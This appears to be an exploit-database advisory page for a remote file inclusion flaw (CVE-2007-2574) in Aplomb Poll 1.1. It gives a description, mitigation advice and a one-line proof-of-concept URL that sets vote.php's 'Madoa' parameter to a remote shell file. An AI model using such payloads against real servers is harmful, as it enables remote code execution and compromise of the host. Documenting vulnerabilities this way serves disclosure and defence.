header-logo
Suggest Exploit
vendor:
Aplomb Poll
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Aplomb Poll
Affected Version From: 1.1
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-2574
CPE: a:aplomb_poll:aplomb_poll:1.1
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

Aplomb Poll Remote File Include Vulnerabilities

The Aplomb Poll application is prone to multiple remote file-include vulnerabilities due to improper sanitization of user-supplied input. An attacker can exploit these vulnerabilities to include a remote file containing malicious PHP code and execute it in the context of the webserver process. This can lead to compromise of the application and the underlying system, as well as other possible attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user-supplied input before using it to include files. Additionally, keeping the application and underlying system up to date with the latest security patches can help prevent exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25138/info
 
Aplomb Poll is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
 
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
 
Aplomb Poll 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/vote.php?Madoa=http://sheel.txt?